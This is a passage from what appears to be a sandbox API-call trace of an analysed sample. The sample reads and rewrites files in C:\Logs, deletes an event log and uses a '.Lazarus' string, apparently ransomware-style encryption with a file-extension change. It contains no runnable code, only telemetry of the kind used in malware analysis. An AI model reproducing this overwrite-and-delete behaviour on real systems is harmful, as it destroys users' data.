lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.601] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.601] GetLastError () returned 0x0 [0085.601] SetLastError (dwErrCode=0x0) [0085.602] GetLastError () returned 0x0 [0085.602] SetLastError (dwErrCode=0x0) [0085.602] GetLastError () returned 0x0 [0085.602] SetLastError (dwErrCode=0x0) [0085.603] GetLastError () returned 0x0 [0085.603] SetLastError (dwErrCode=0x0) [0085.603] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.603] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.603] GetLastError () returned 0x0 [0085.603] SetLastError (dwErrCode=0x0) [0085.603] GetLastError () returned 0x0 [0085.603] SetLastError (dwErrCode=0x0) [0085.603] GetLastError () returned 0x0 [0085.603] SetLastError (dwErrCode=0x0) [0085.603] GetLastError () returned 0x0 [0085.603] SetLastError (dwErrCode=0x0) [0085.604] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.604] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.604] GetLastError () returned 0x0 [0085.604] SetLastError (dwErrCode=0x0) [0085.604] GetLastError () returned 0x0 [0085.604] SetLastError (dwErrCode=0x0) [0085.604] GetLastError () returned 0x0 [0085.604] SetLastError (dwErrCode=0x0) [0085.604] GetLastError () returned 0x0 [0085.604] SetLastError (dwErrCode=0x0) [0085.604] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.605] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.605] GetLastError () returned 0x0 [0085.605] SetLastError (dwErrCode=0x0) [0085.605] GetLastError () returned 0x0 [0085.605] SetLastError (dwErrCode=0x0) [0085.605] GetLastError () returned 0x0 [0085.605] SetLastError (dwErrCode=0x0) [0085.605] GetLastError () returned 0x0 [0085.605] SetLastError (dwErrCode=0x0) [0085.605] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.605] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.606] GetLastError () returned 0x0 [0085.606] SetLastError (dwErrCode=0x0) [0085.606] GetLastError () returned 0x0 [0085.606] SetLastError (dwErrCode=0x0) [0085.606] GetLastError () returned 0x0 [0085.606] SetLastError (dwErrCode=0x0) [0085.606] GetLastError () returned 0x0 [0085.606] SetLastError (dwErrCode=0x0) [0085.606] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.606] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.607] GetLastError () returned 0x0 [0085.607] SetLastError (dwErrCode=0x0) [0085.607] GetLastError () returned 0x0 [0085.607] SetLastError (dwErrCode=0x0) [0085.607] GetLastError () returned 0x0 [0085.607] SetLastError (dwErrCode=0x0) [0085.607] GetLastError () returned 0x0 [0085.607] SetLastError (dwErrCode=0x0) [0085.607] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.607] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.607] GetLastError () returned 0x0 [0085.607] SetLastError (dwErrCode=0x0) [0085.608] GetLastError () returned 0x0 [0085.608] SetLastError (dwErrCode=0x0) [0085.608] GetLastError () returned 0x0 [0085.608] SetLastError (dwErrCode=0x0) [0085.608] GetLastError () returned 0x0 [0085.608] SetLastError (dwErrCode=0x0) [0085.608] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.608] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.608] GetLastError () returned 0x0 [0085.608] SetLastError (dwErrCode=0x0) [0085.608] GetLastError () returned 0x0 [0085.608] SetLastError (dwErrCode=0x0) [0085.609] GetLastError () returned 0x0 [0085.609] SetLastError (dwErrCode=0x0) [0085.609] GetLastError () returned 0x0 [0085.609] SetLastError (dwErrCode=0x0) [0085.609] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0085.609] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0085.609] GetLastError () returned 0x0 [0085.609] SetLastError (dwErrCode=0x0) [0085.609] GetLastError () returned 0x0 [0085.609] SetLastError (dwErrCode=0x0) [0085.609] GetLastError () returned 0x0 [0085.609] SetLastError (dwErrCode=0x0) [0085.610] GetLastError () returned 0x0 [0085.610] SetLastError (dwErrCode=0x0) [0085.610] ReadFile (in: hFile=0x424, lpBuffer=0x4f220, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x4f220*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d588 | out: hHeap=0x20000) returned 1 [0085.610] WriteFile (in: hFile=0x348, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0x1000, lpOverlapped=0x0) returned 1 [0085.610] GetLastError () returned 0x0 [0085.610] SetLastError (dwErrCode=0x0) [0085.610] GetLastError () returned 0x0 [0085.610] SetLastError (dwErrCode=0x0) [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0085.610] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.610] CloseHandle (hObject=0x348) returned 1 [0085.612] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4f220 | out: hHeap=0x20000) returned 1 [0085.612] CloseHandle (hObject=0x424) returned 1 [0085.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0085.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0085.612] AreFileApisANSI () returned 1 [0085.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.612] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x52bd8 [0085.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52bd8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.613] CreateFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.614] GetFileType (hFile=0x424) returned 0x1 [0085.614] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52bd8 | out: hHeap=0x20000) returned 1 [0085.614] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0085.614] GetLastError () returned 0xb7 [0085.614] SetLastError (dwErrCode=0xb7) [0085.614] WriteFile (in: hFile=0x424, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0085.615] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0085.615] CloseHandle (hObject=0x424) returned 1 [0085.615] AreFileApisANSI () returned 1 [0085.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 31 [0085.615] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3e) returned 0x52bd8 [0085.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88680, cbMultiByte=-1, lpWideCharStr=0x52bd8, cchWideChar=31 | out: lpWideCharStr="C:\\Logs\\Internet Explorer.evtx") returned 31 [0085.615] DeleteFileW (lpFileName="C:\\Logs\\Internet Explorer.evtx" (normalized: "c:\\logs\\internet explorer.evtx")) returned 1 [0085.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52bd8 | out: hHeap=0x20000) returned 1 [0085.616] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d690 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d540 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53970 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8b9c8 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.617] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0085.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.618] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.618] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x1, dwReserved1=0x0, cFileName="Key Management Service.evtx", cAlternateFileName="KEYMAN~1.EVT")) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f90 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52f38 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x530a0 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x530a0 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52f38 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f90 | out: hHeap=0x20000) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f90 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0085.618] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0085.618] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52bd8 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x530a0 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0085.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x530a0 | out: hHeap=0x20000) returned 1 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0085.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0085.619] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52bd8 | out: hHeap=0x20000) returned 1 [0085.619] AreFileApisANSI () returned 1 [0085.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Key Management Service.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Key Management Service.evtx", lpUsedDefaultChar=0x0) returned 36 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0085.619] AreFileApisANSI () returned 1 [0085.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.619] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68ef0 [0085.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x68ef0, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.619] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.620] GetFileType (hFile=0x424) returned 0x1 [0085.620] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68ef0 | out: hHeap=0x20000) returned 1 [0085.620] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0085.620] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0085.620] SetFilePointerEx (in: hFile=0x424, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0085.620] CloseHandle (hObject=0x424) returned 1 [0085.620] AreFileApisANSI () returned 1 [0085.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.620] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x693a0 [0085.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x693a0, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.621] CreateFileW (lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x424 [0085.621] GetFileType (hFile=0x424) returned 0x1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693a0 | out: hHeap=0x20000) returned 1 [0085.621] CloseHandle (hObject=0x424) returned 1 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52bd8 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52f38 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x529e0 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x529e0 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52f38 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52bd8 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52dd0 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52f38 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x529e0 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x530a0 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x529e0 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52f38 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52dd0 | out: hHeap=0x20000) returned 1 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x529e0 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x530a0 | out: hHeap=0x20000) returned 1 [0085.621] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x52bd8 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x529e0 | out: hHeap=0x20000) returned 1 [0085.621] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x52bd8 | out: hHeap=0x20000) returned 1 [0085.621] AreFileApisANSI () returned 1 [0085.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68bd0 [0085.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e298, cbMultiByte=-1, lpWideCharStr=0x68bd0, cchWideChar=36 | out: lpWideCharStr="C:\\Logs\\Key Management Service.evtx") returned 36 [0085.622] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Key Management Service.evtx" (normalized: "c:\\logs\\key management service.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5057bed8, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5057bed8, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68bd0 | out: hHeap=0x20000) returned 1 [0085.622] AreFileApisANSI () returned 1 [0085.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0085.622] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0085.622] GetLastError () returned 0x0 [0085.622] SetLastError (dwErrCode=0x0) [0085.622] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 